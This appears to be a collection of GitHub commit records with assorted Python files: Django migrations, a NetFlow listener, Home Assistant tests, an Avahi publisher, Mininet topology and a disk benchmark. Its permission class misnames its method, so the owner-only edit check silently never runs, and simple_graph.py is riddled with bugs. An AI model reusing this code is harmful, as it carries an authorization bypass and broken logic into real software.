'deadline': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lesson': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['experiment.Lesson']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'remark': ('django.db.models.fields.TextField', [], {'blank': 'True'})
},
u'experiment.lesson': {
'Meta': {'object_name': 'Lesson'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['experiment.LessonCategory']"}),
'create_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'status': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'students': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.User']", 'symmetrical': 'False'}),
'teacher': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['teacher.Teacher']"})
},
u'experiment.lessoncategory': {
'Meta': {'object_name': 'LessonCategory'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '60'})
},
u'teacher.teacher': {
'Meta': {'object_name': 'Teacher'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
}
}
complete_apps = ['experiment'] | Python | 0 | |
459f87be465e0f5554c708fe60679494d152c8fd | Create permissions.py | templates/root/main/permissions.py | templates/root/main/permissions.py | from rest_framework import permissions
class IsOwnerOrReadOnly(permissions.BasePermission):
"""
Custom permission to only allow owners of an object to edit it.
"""
def has_object_permissions(self, request, view, obj):
# Read permissions are allowed to any request,
# so we'll always allow GET, HEAD, or OPTIONS requests.
if request.method in permissions.SAFE_METHODS:
return True
# Write permissions are only allowed to the owner of the snippet.
return obj.owner == request.user
| Python | 0.000001 | |
4a98686b63563b209456a8933ef34477adcdae43 | extend Phabricator class and do nothing | phabricate/phab.py | phabricate/phab.py | from phabricator import Phabricator as _Phabricator
class Phabricator(_Phabricator):
pass
| Python | 0 | |
99e2ad1c812d98bb5c952780b78097ef56fdccdc | add netflow listener | utils/netflow.py | utils/netflow.py | #!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
# Copyright (c) 2014 Mozilla Corporation
#
# Contributors:
# Anthony Verez averez@mozilla.com
import socket, struct, sys
from socket import inet_ntoa
SIZE_OF_HEADER = 24
SIZE_OF_RECORD = 48
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if len(sys.argv) == 4:
sock.bind((sys.argv[1], int(sys.argv[2])))
else:
print "Usage: python ./netflow.py <listening_addr> <listening_udp_port> <log_file>"
sys.exit(1)
# doc: http://www.plixer.com/support/netflow_v5.html
f = file(sys.argv[3], 'a')
fields = [
'version', # 0
'count', # 1
'sys_uptime', # 2
'unix_secs', # 3
'unix_nsecs', # 4
'flow_sequence', # 5
'engine_type', # 6
'engine_id', # 7
'sampling_interval', # 8
'srcaddr', # 9
'dstaddr', # 10
'nexthop', # 11
'dPkts', # 12
'dOctets', # 13
'first', # 14
'last', # 15
'srcport', # 16
'dstport', # 17
'tcp_flags', # 18
'prot', # 19
'tos', # 20
'src_as', # 21
'dst_as', # 22
'src_mask', # 23
'dst_mask', # 24
]
for h in fields:
f.write("%s\t" % h)
f.write("\n")
while True:
buf, addr = sock.recvfrom(1500)
header = {}
# NetFlow export format version number
# Number of flows exported in this packet (1-30)
(header['version'], header['count']) = struct.unpack('!HH',buf[0:4])
if header['version'] != 5:
print "Not NetFlow v5!"
continue
# It's pretty unlikely you'll ever see more then 1000 records in a 1500 byte UDP packet
if header['count'] <= 0 or header['count'] >= 1000:
print "Invalid count %s" % header['count']
continue
# Current time in milliseconds since the export device booted
header['sys_uptime'] = socket.ntohl(struct.unpack('I', buf[4:8])[0])
# Current count of seconds since 0000 UTC 1970
header['unix_secs'] = socket.ntohl(struct.unpack('I', buf[8:12])[0])
# Residual nanoseconds since 0000 UTC 1970
header['unix_nsecs'] = socket.ntohl(struct.unpack('I', buf[12:16])[0])
# Sequence counter of total flows seen
header['flow_sequence'] = socket.ntohl(struct.unpack('I', buf[16:20])[0])
# Type of flow-switching engine
header['engine_type'] = socket.ntohl(struct.unpack('B', buf[20])[0])
# Slot number of the flow-switching engine
header['engine_id'] = socket.ntohl(struct.unpack('B', buf[21])[0])
# First two bits hold the sampling mode; remaining 14 bits hold value of sampling interval
header['sampling_interval'] = struct.unpack('!H', buf[22:24])[0] & 0b0011111111111111
#print header
for i in range(0, header['count']):
try:
base = SIZE_OF_HEADER+(i*SIZE_OF_RECORD)
data = struct.unpack('!IIIIHH',buf[base+16:base+36])
data2 = struct.unpack('!BBBHHBB',buf[base+37:base+46])
record = header
# Source IP address
record['srcaddr'] = inet_ntoa(buf[base+0:base+4])
# Destination IP address
record['dstaddr'] = inet_ntoa(buf[base+4:base+8])
# IP address of next hop router
record['nexthop'] = inet_ntoa(buf[base+8:base+12])
# Packets in the flow
record['dPkts'] = data[0]
# Total number of Layer 3 bytes in the packets of the flow
record['dOctets'] = data[1]
# SysUptime at start of flow
record['first'] = data[2]
# SysUptime at the time the last packet of the flow was received
record['last'] = data[3]
# TCP/UDP source port number or equivalent
record['srcport'] = data[4]
# TCP/UDP destination port number or equivalent
record['dstport'] = data[5]
# Cumulative OR of TCP flags
record['tcp_flags'] = data2[0]
# IP protocol type (for example, TCP = 6; UDP = 17)
record['prot'] = data2[1]
# IP type of service (ToS)
record['tos'] = data2[2]
# Autonomous system number of the source, either origin or peer
record['src_as'] = data2[3]
# Autonomous system number of the destination, either origin or peer
record['dst_as'] = data2[4]
# Source address prefix mask bits
record['src_mask'] = data2[5]
# Destination address prefix mask bits
record['dst_mask'] = data2[6]
for h in fields:
f.write("%s\t" % record[h])
f.write("\n")
#print record
except:
continue
# Do something with the netflow record..
#print "%s:%s -> %s:%s" % (record['srcaddr'],record['srcport'],record['dstaddr'],record['dstport'])
f.close()
| Python | 0.000001 | |
cca6b0c28747a3b0307fccd33dee60fcb42d910d | Test Fix. | tests/components/garage_door/test_demo.py | tests/components/garage_door/test_demo.py | """
tests.components.garage_door.test_demo
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests demo garage door component.
"""
import unittest
import homeassistant.core as ha
import homeassistant.components.garage_door as gd
LEFT = 'garage_door.left_garage_door'
RIGHT = 'garage_door.right_garage_door'
class TestGarageDoorDemo(unittest.TestCase):
""" Test the demo garage door. """
def setUp(self): # pylint: disable=invalid-name
self.hass = ha.HomeAssistant()
self.assertTrue(gd.setup(self.hass, {
'garage_door': {
'platform': 'demo'
}
}))
def tearDown(self): # pylint: disable=invalid-name
""" Stop down stuff we started. """
self.hass.stop()
def test_is_closed(self):
self.assertTrue(gd.is_closed(self.hass, LEFT))
self.hass.states.is_state(LEFT, 'close')
self.assertFalse(gd.is_closed(self.hass, RIGHT))
self.hass.states.is_state(RIGHT, 'open')
def test_open_door(self):
gd.open_door(self.hass, LEFT)
self.hass.pool.block_till_done()
self.assertFalse(gd.is_closed(self.hass, LEFT))
def test_close_door(self):
gd.close_door(self.hass, RIGHT)
self.hass.pool.block_till_done()
self.assertTrue(gd.is_closed(self.hass, RIGHT))
| """
tests.components.garage_door.test_demo
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests demo garage door component.
"""
import unittest
import homeassistant.core as ha
import homeassistant.components.garage_door as gd
LEFT = 'garage_door.left_garage_door'
RIGHT = 'garage_door.right_garage_door'
class TestGarageDoorDemo(unittest.TestCase):
""" Test the demo garage door. """
def setUp(self): # pylint: disable=invalid-name
self.hass = ha.HomeAssistant()
self.assertTrue(gd.setup(self.hass, {
'garage_door': {
'platform': 'demo'
}
}))
def tearDown(self): # pylint: disable=invalid-name
""" Stop down stuff we started. """
self.hass.stop()
def test_is_closed(self):
self.assertTrue(gd.is_closed(self.hass, LEFT))
self.hass.states.is_state(LEFT, 'close')
self.assertFalse(gd.is_closed(self.hass, RIGHT))
self.hass.states.is_state(RIGHT, 'open')
def test_open_door(self):
gd.open_door(self.hass, LEFT)
self.hass.pool.block_till_done()
self.assertTrue(gd.is_closed(self.hass, LEFT))
def test_close_door(self):
gd.close_door(self.hass, RIGHT)
self.hass.pool.block_till_done()
self.assertFalse(gd.is_closed(self.hass, RIGHT))
| Python | 0 |
67d0d381003dc02d5e1eae9d0c8591daee4b93b3 | Migrate SnafuComics to single-class module. | dosagelib/plugins/snafu.py | dosagelib/plugins/snafu.py | # -*- coding: utf-8 -*-
# Copyright (C) 2004-2005 Tristan Seligmann and Jonathan Jacobs
# Copyright (C) 2012-2014 Bastian Kleineidam
# Copyright (C) 2015-2016 Tobias Gruetzmacher
from __future__ import absolute_import, division, print_function
from ..scraper import _ParserScraper
from ..helpers import indirectStarter
class Snafu(_ParserScraper):
# Next and Previous are swapped...
prevSearch = '//a[@class="next"]'
imageSearch = '//div[@class="comicpage"]/img'
latestSearch = '//div[@id="feed"]/a'
starter = indirectStarter
def __init__(self, name, path):
super(Snafu, self).__init__('SnafuComics/' + name)
self.url = 'http://snafu-comics.com/swmseries/' + path
def namer(self, image_url, page_url):
year, month, name = image_url.rsplit('/', 3)[1:]
return "%04s_%02s_%s" % (year, month, name)
@classmethod
def getmodules(cls):
return [
cls('Braindead', 'braindead'),
cls('Bunnywith', 'bunnywith'),
cls('DeliverUsEvil', 'deliverusevil'),
cls('EA', 'ea'),
cls('FT', 'ft'),
cls('GrimTalesFromDownBelow', 'grimtales'),
cls('KOF', 'kof'),
cls('MyPanda', 'mypanda'),
cls('NarutoHeroesPath', 'naruto'),
cls('NewSuperMarioAdventures', 'nsma'),
cls('PowerPuffGirls', 'powerpuffgirls'),
# cls('PSG2', 'psg2'), -- Strangely broken
cls('SatansExcrement', 'satansexcrement'),
cls('SF', 'sf'),
cls('SkullBoy', 'skullboy'),
cls('Snafu', 'snafu'),
cls('Soul', 'soul'),
cls('Sugar', 'sugarbits'),
cls('SureToBeBanD', 'stbb'),
cls('TheLeague', 'league'),
cls('Tin', 'tin'),
cls('Titan', 'titan'),
cls('TrunksAndSoto', 'trunks-and-soto'),
cls('TW', 'tw'),
cls('Zim', 'zim'),
]
| # -*- coding: utf-8 -*-
# Copyright (C) 2004-2005 Tristan Seligmann and Jonathan Jacobs
# Copyright (C) 2012-2014 Bastian Kleineidam
# Copyright (C) 2015-2016 Tobias Gruetzmacher
from __future__ import absolute_import, division, print_function
from ..scraper import _ParserScraper
from ..helpers import indirectStarter
class _Snafu(_ParserScraper):
# Next and Previous are swapped...
prevSearch = '//a[@class="next"]'
imageSearch = '//div[@class="comicpage"]/img'
latestSearch = '//div[@id="feed"]/a'
starter = indirectStarter
def __init__(self, name):
super(_Snafu, self).__init__('SnafuComics/' + name)
def namer(self, image_url, page_url):
year, month, name = image_url.rsplit('/', 3)[1:]
return "%04s_%02s_%s" % (year, month, name)
@property
def url(self):
return 'http://snafu-comics.com/swmseries/' + self.path
class Braindead(_Snafu):
path = 'braindead'
class Bunnywith(_Snafu):
path = 'bunnywith'
class DeliverUsEvil(_Snafu):
path = 'deliverusevil'
class DigitalPurgatory(_Snafu):
path = 'digital-purgatory'
class EA(_Snafu):
path = 'ea'
class FT(_Snafu):
path = 'ft'
class GrimTalesFromDownBelow(_Snafu):
path = 'grimtales'
class KOF(_Snafu):
path = 'kof'
class MyPanda(_Snafu):
path = 'mypanda'
class NarutoHeroesPath(_Snafu):
path = 'naruto'
class NewSuperMarioAdventures(_Snafu):
path = 'nsma'
class PowerPuffGirls(_Snafu):
path = 'powerpuffgirls'
class PSG2(_Snafu):
path = 'psg2'
class SatansExcrement(_Snafu):
path = 'satansexcrement'
class SF(_Snafu):
path = 'sf'
class SkullBoy(_Snafu):
path = 'skullboy'
class Snafu(_Snafu):
path = 'snafu'
class Soul(_Snafu):
path = 'soul'
class Sugar(_Snafu):
path = 'sugarbits'
class SureToBeBanD(_Snafu):
path = 'stbb'
class TheLeague(_Snafu):
path = 'league'
class Tin(_Snafu):
path = 'tin'
class Titan(_Snafu):
path = 'titan'
class TrunksAndSoto(_Snafu):
path = 'trunks-and-soto'
class TW(_Snafu):
path = 'tw'
class Zim(_Snafu):
path = 'zim'
| Python | 0 |
43cf23e793794fd45322471a52c83785070ac243 | add simple_graph | simple_graph.py | simple_graph.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
class Graph(object):
def __init__(self):
self.gdict = {}
def nodes(self):
return self.gdict.keys()
def edges(self):
self.edges = []
for node in self.gdict:
for end in self.gdict[node]:
self.edges.append((node, end))
return self.edges
def add_node(self, n):
self.gdict.setdefault(n, [])
def add_edge(self, n1, n2):
self.gdict[n1].setdefault(n2, [])
try:
self.gdict[n1].append(n2)
except KeyError:
self.gdict[n1] = [n2]
def del_node(self, n):
try:
del self.gdict[n1]
except KeyError:
raise KeyError('{} not in the graph.'.format(n1))
for nodelist in self.gdit.values():
try:
nodelist.remove(n)
except ValueError:
continue
def del_edge(self, n1, n2):
try:
self.gdict[n1].remove[n2]
except KeyError, ValueError:
raise ValueError('Edge {}, {} not in the graph.'.format(n1, n2))
def has_node(self, n):
return n in self.gdict
def neighbors(self, n):
try:
return self.gdict[n]
except KeyError:
raise KeyError('{} not in the graph.'.format(n1))
def adjacent(self, n1, n2):
if n1 not in self.dict or n2 not in self.gdict:
raise KeyError('One of these nodes is not in the graph.')
return n2 in self.gdict[n1]
| Python | 0.999579 | |
d7e6291564a5d5683a8b03fc9a761ad3e3dd70ea | Bump version to stable. | usb/__init__.py | usb/__init__.py | # Copyright (C) 2009-2014 Wander Lairson Costa
#
# The following terms apply to all files associated
# with the software unless explicitly disclaimed in individual files.
#
# The authors hereby grant permission to use, copy, modify, distribute,
# and license this software and its documentation for any purpose, provided
# that existing copyright notices are retained in all copies and that this
# notice is included verbatim in any distributions. No written agreement,
# license, or royalty fee is required for any of the authorized uses.
# Modifications to this software may be copyrighted by their authors
# and need not follow the licensing terms described here, provided that
# the new terms are clearly indicated on the first page of each file where
# they apply.
#
# IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
# FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
# ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
# DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
# IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
# NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
# MODIFICATIONS.
r"""PyUSB - Easy USB access in Python
This package exports the following modules and subpackages:
core - the main USB implementation
legacy - the compatibility layer with 0.x version
backend - the support for backend implementations.
control - USB standard control requests.
libloader - helper module for backend library loading.
Since version 1.0, main PyUSB implementation lives in the 'usb.core'
module. New applications are encouraged to use it.
"""
import logging
import os
__author__ = 'Wander Lairson Costa'
# Use Semantic Versioning, http://semver.org/
version_info = (1, 0, 0)
__version__ = '%d.%d.%d' % version_info
__all__ = ['legacy', 'control', 'core', 'backend', 'util', 'libloader']
def _setup_log():
from usb import _debug
logger = logging.getLogger('usb')
debug_level = os.getenv('PYUSB_DEBUG')
if debug_level is not None:
_debug.enable_tracing(True)
filename = os.getenv('PYUSB_LOG_FILENAME')
LEVELS = {'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL}
level = LEVELS.get(debug_level, logging.CRITICAL + 10)
logger.setLevel(level = level)
try:
handler = logging.FileHandler(filename)
except:
handler = logging.StreamHandler()
fmt = logging.Formatter('%(asctime)s %(levelname)s:%(name)s:%(message)s')
handler.setFormatter(fmt)
logger.addHandler(handler)
else:
class NullHandler(logging.Handler):
def emit(self, record):
pass
# We set the log level to avoid delegation to the
# parent log handler (if there is one).
# Thanks to Chris Clark to pointing this out.
logger.setLevel(logging.CRITICAL + 10)
logger.addHandler(NullHandler())
_setup_log()
# We import all 'legacy' module symbols to provide compatibility
# with applications that use 0.x versions.
from usb.legacy import *
| # Copyright (C) 2009-2014 Wander Lairson Costa
#
# The following terms apply to all files associated
# with the software unless explicitly disclaimed in individual files.
#
# The authors hereby grant permission to use, copy, modify, distribute,
# and license this software and its documentation for any purpose, provided
# that existing copyright notices are retained in all copies and that this
# notice is included verbatim in any distributions. No written agreement,
# license, or royalty fee is required for any of the authorized uses.
# Modifications to this software may be copyrighted by their authors
# and need not follow the licensing terms described here, provided that
# the new terms are clearly indicated on the first page of each file where
# they apply.
#
# IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
# FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
# ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
# DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
# IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
# NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
# MODIFICATIONS.
r"""PyUSB - Easy USB access in Python
This package exports the following modules and subpackages:
core - the main USB implementation
legacy - the compatibility layer with 0.x version
backend - the support for backend implementations.
control - USB standard control requests.
libloader - helper module for backend library loading.
Since version 1.0, main PyUSB implementation lives in the 'usb.core'
module. New applications are encouraged to use it.
"""
import logging
import os
__author__ = 'Wander Lairson Costa'
# Use Semantic Versioning, http://semver.org/
version_info = (1, 0, 0, 'rc1')
__version__ = '%d.%d.%d%s' % version_info
__all__ = ['legacy', 'control', 'core', 'backend', 'util', 'libloader']
def _setup_log():
from usb import _debug
logger = logging.getLogger('usb')
debug_level = os.getenv('PYUSB_DEBUG')
if debug_level is not None:
_debug.enable_tracing(True)
filename = os.getenv('PYUSB_LOG_FILENAME')
LEVELS = {'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL}
level = LEVELS.get(debug_level, logging.CRITICAL + 10)
logger.setLevel(level = level)
try:
handler = logging.FileHandler(filename)
except:
handler = logging.StreamHandler()
fmt = logging.Formatter('%(asctime)s %(levelname)s:%(name)s:%(message)s')
handler.setFormatter(fmt)
logger.addHandler(handler)
else:
class NullHandler(logging.Handler):
def emit(self, record):
pass
# We set the log level to avoid delegation to the
# parent log handler (if there is one).
# Thanks to Chris Clark to pointing this out.
logger.setLevel(logging.CRITICAL + 10)
logger.addHandler(NullHandler())
_setup_log()
# We import all 'legacy' module symbols to provide compatibility
# with applications that use 0.x versions.
from usb.legacy import *
| Python | 0 |
7d9b004b3fb33ed9f16ca657ddb6ee3ddf452802 | add dump2pe (t2_08 sample) | elfesteem/t2_08_dump2pe.py | elfesteem/t2_08_dump2pe.py | #! /usr/bin/env python
import pe
from pe_init import PE
import rlcompleter,readline,pdb, sys
from pprint import pprint as pp
readline.parse_and_bind("tab: complete")
import shlex
f = open('my_dump.txt', 'r')
for i in xrange(27):
f.readline()
state = 0
funcs = []
dll = ""
#parse imprec output
new_dll = []
while True:
l = f.readline()
if not l:
break
l = l.strip()
if state == 0 and l.startswith("FThunk"):
t = [r for r in shlex.shlex(l)]
ad = int(t[2], 16)
state = 1
continue
if state == 1:
t = [r for r in shlex.shlex(l)]
if not len(t):
new_dll.append(({"name":dll,
"firstthunk":ad},funcs[:] ))
dll = ""
funcs, state = [], 0
else:
dll = t[2]
funcs.append(t[6])
continue
pp(new_dll)
data = open('DUMP_00401000-00479000', 'rb').read()
e = PE()
e.DirImport.add_dlldesc(new_dll)
s_text = e.SHList.add_section(name = "text", addr = 0x1000, data = data)
s_myimp = e.SHList.add_section(name = "myimp", rawsize = len(e.DirImport))
e.DirImport.set_rva(s_myimp.addr)
e.Opthdr.Opthdr.AddressOfEntryPoint = s_text.addr
open('uu.bin', 'wb').write(str(e))
| Python | 0 | |
0881e326a604977bcaf385db152a96826db52b74 | Add class for publishing a service on avahi | wizd/publish.py | wizd/publish.py | import dbus
import gobject
import avahi
import threading
import sys
from dbus.mainloop.glib import DBusGMainLoop
"""
Class for publishing a service on DNS-SD using Avahi.
Creates a thread to handle requests
"""
class ServicePublisher (threading.Thread):
def __init__(self, name, type, port, txt = "", domain = "", host = ""):
threading.Thread.__init__(self)
gobject.threads_init()
self._name = name
self._type = type
self._port = port
self._txt = txt
self._domain = ""
self._host = ""
self._group = None
self._rename_count = 12 # Counter so we only rename after collisions a sensible number of times
def run(self):
DBusGMainLoop( set_as_default=True )
self._main_loop = gobject.MainLoop()
self._bus = dbus.SystemBus()
self._server = dbus.Interface(
self._bus.get_object( avahi.DBUS_NAME, avahi.DBUS_PATH_SERVER ),
avahi.DBUS_INTERFACE_SERVER )
self._server.connect_to_signal( "StateChanged", self._server_state_changed )
self._server_state_changed( self._server.GetState() )
self._main_loop.run()
if not self._group is None:
self._group.Free()
def stop(self):
self._main_loop.quit()
def _add_service(self):
if self._group is None:
self._group = dbus.Interface(
self._bus.get_object( avahi.DBUS_NAME, self._server.EntryGroupNew()),
avahi.DBUS_INTERFACE_ENTRY_GROUP)
self._group.connect_to_signal('StateChanged', self._entry_group_state_changed)
print "Adding service '%s' of type '%s' ..." % (self._name, self._type)
self._group.AddService(
avahi.IF_UNSPEC, #interface
avahi.PROTO_UNSPEC, #protocol
0, #flags
self._name, self._type,
self._domain, self._host,
dbus.UInt16(self._port),
avahi.string_array_to_txt_array(self._txt))
self._group.Commit()
def _remove_service(self):
if not self._group is None:
self._group.Reset()
def _server_state_changed(self, state):
if state == avahi.SERVER_COLLISION:
print "WARNING: Server name collision"
self._remove_service()
elif state == avahi.SERVER_RUNNING:
self._add_service()
def _entry_group_state_changed(self, state, error):
print "state change: %i" % state
if state == avahi.ENTRY_GROUP_ESTABLISHED:
print "Service established."
elif state == avahi.ENTRY_GROUP_COLLISION:
self._rename_count = self._rename_count - 1
if rename_count > 0:
name = server.GetAlternativeServiceName(name)
print "WARNING: Service name collision, changing name to '%s' ..." % name
self._remove_service()
self._add_service()
else:
print "ERROR: No suitable service name found after %i retries, exiting." % n_rename
self._main_loop.quit()
elif state == avahi.ENTRY_GROUP_FAILURE:
print "Error in group state changed", error
self._main_loop.quit()
return
if __name__ == "__main__":
sp = ServicePublisher("test","_test._tcp",1234)
sp.start()
chr = sys.stdin.read(1)
sp.stop()
| Python | 0 | |
062b4d045580adaebf30376cae1b88387dc7f3bb | add test_db | www/test_deb.py | www/test_deb.py | # coding=utf-8
from www.models import User
from www.transwarp import db
__author__ = 'xubinggui'
db.create_engine(user='www-data', password='www-data', database='awesome')
u = User(name='Test', email='test@example.com', password='1234567890', image='about:blank')
u.insert()
print 'new user id:', u.id
u1 = User.find_first('where email=?', 'test@example.com')
print 'find user\'s name:', u1.name
u1.delete()
u2 = User.find_first('where email=?', 'test@example.com')
print 'find user:', u2 | Python | 0.000001 | |
64c24ee2813e5d85866d14cfdee8258b91c09df6 | add debug topology file | evaluation/topo-fattree.py | evaluation/topo-fattree.py | """Custom topology example
Two directly connected switches plus a host for each switch:
host --- switch --- switch --- host
Adding the 'topos' dict with a key/value pair to generate our newly defined
topology enables one to pass in '--topo=mytopo' from the command line.
"""
from mininet.topo import Topo
class MyTopo( Topo ):
"Simple topology example."
def __init__( self ):
"Create custom topo."
# Initialize topology
Topo.__init__( self )
# Add hosts and switches
host1 = self.addHost('h1')
host2 = self.addHost('h2')
host3 = self.addHost('h3')
host4 = self.addHost('h4')
host5 = self.addHost('h5')
host6 = self.addHost('h6')
host7 = self.addHost('h7')
host8 = self.addHost('h8')
switch1 = self.addSwitch('s1')
switch2 = self.addSwitch('s2')
switch3 = self.addSwitch('s3')
switch4 = self.addSwitch('s4')
switch5 = self.addSwitch('s5')
switch6 = self.addSwitch('s6')
switch7 = self.addSwitch('s7')
switch8 = self.addSwitch('s8')
switch9 = self.addSwitch('s9')
switch10 = self.addSwitch('s10')
# Add links
self.addLink(host1, switch1)
self.addLink(host2, switch1)
self.addLink(host3, switch2)
self.addLink(host4, switch2)
self.addLink(switch1, switch3)
self.addLink(switch1, switch4)
self.addLink(switch2, switch3)
self.addLink(switch2, switch4)
self.addLink(host5, switch5)
self.addLink(host6, switch5)
self.addLink(host7, switch6)
self.addLink(host8, switch6)
self.addLink(switch5, switch7)
self.addLink(switch5, switch8)
self.addLink(switch6, switch7)
self.addLink(switch6, switch8)
self.addLink(switch3, switch9)
self.addLink(switch3, switch10)
self.addLink(switch4, switch9)
self.addLink(switch4, switch10)
self.addLink(switch7, switch9)
self.addLink(switch7, switch10)
self.addLink(switch8, switch9)
self.addLink(switch8, switch10)
topos = { 'fattree': ( lambda: MyTopo() ) }
| Python | 0.000001 | |
58ed327ce441f41d3e9a2bff60e0c2a428b51192 | add initial disk I/O benchmark script | examples/run_benchmarks.py | examples/run_benchmarks.py | import sys
import os
import resource
import shutil
import shlex
import time
import subprocess
import random
# this is a disk I/O benchmark script. It runs menchmarks
# over different filesystems, different cache sizes and
# different number of peers (can be used to find a reasonable
# range for unchoke slots).
# it also measures performance improvements of re-ordering
# read requests based on physical location and OS hints
# like posix_fadvice(FADV_WILLNEED). It can also be used
# for the AIO branch to measure improvements over the
# classic thread based disk I/O
# to set up the test, build the example directoryin release
# with statistics=on and copy fragmentation_test, client_test
# and connection_tester to the current directory.
# make sure gnuplot is installed.
# the following lists define the space tests will be run in
# variables to test. All these are run on the first
# entry in the filesystem list.
cache_sizes = [0, 256, 512, 1024, 2048, 4096, 8192]
peers = [10, 100, 500, 1000, 2000]
# the drives are assumed to be mounted under ./<name>
# or have symbolic links to them.
filesystem = ['ext4', 'ext3', 'reiser', 'xfs']
# the number of peers for the filesystem test. The
# idea is to stress test the filesystem by using a lot
# of peers, since each peer essentially is a separate
# read location on the platter
filesystem_peers = 1000
# the amount of cache for the filesystem test
filesystem_cache = 8192
# the number of seconds to run each test. It's important that
# this is shorter than what it takes to finish downloading
# the test torrent, since then the average rate will not
# be representative of the peak anymore
test_duration = 400
# make sure the environment is properly set up
if resource.getrlimit(resource.RLIMIT_NOFILE)[0] < 4000:
print 'please set ulimit -n to at least 4000'
sys.exit(1)
# make sure we have all the binaries available
binaries = ['client_test', 'connection_tester', 'fragmentation_test']
for i in binaries:
if not os.path.exists(i):
print 'make sure "%s" is available in current working directory' % i
sys.exit(1)
for i in filesystem:
if not os.path.exists(i):
print ('the path "%s" does not exist. This is directory/mountpoint is ' +
'used as the download directory and is the filesystem that will be benchmarked ' +
'and need to exist.') % i
sys.exit(1)
# make sure we have a test torrent
if not os.path.exists('test.torrent'):
print 'generating test torrent'
os.system('./connection_tester gen-torrent test.torrent')
# use a new port for each test to make sure they keep working
# this port is incremented for each test run
port = 10000 + random.randint(0, 5000)
def build_commandline(config, port):
num_peers = config['num-peers']
no_disk_reorder = '';
if config['allow-disk-reorder'] == False:
no_disk_reorder = '-O'
no_read_ahead = ''
if config['read-ahead'] == False:
no_read_ahead = '-j'
global test_duration
return './client_test -k -z -N -h -H -M -S %d -T %d -c %d -C %d -s "%s" %s %s -q %d -p %d -l session_stats/alerts_log.txt test.torrent' \
% (num_peers, num_peers, num_peers, config['cache-size'], config['save-path'] \
, no_disk_reorder, no_read_ahead, test_duration, port)
def delete_files(files):
for i in files:
try: os.remove(i)
except:
try: shutil.rmtree(i)
except: pass
def build_test_config(fs, num_peers, cache_size, readahead=True, reorder=True):
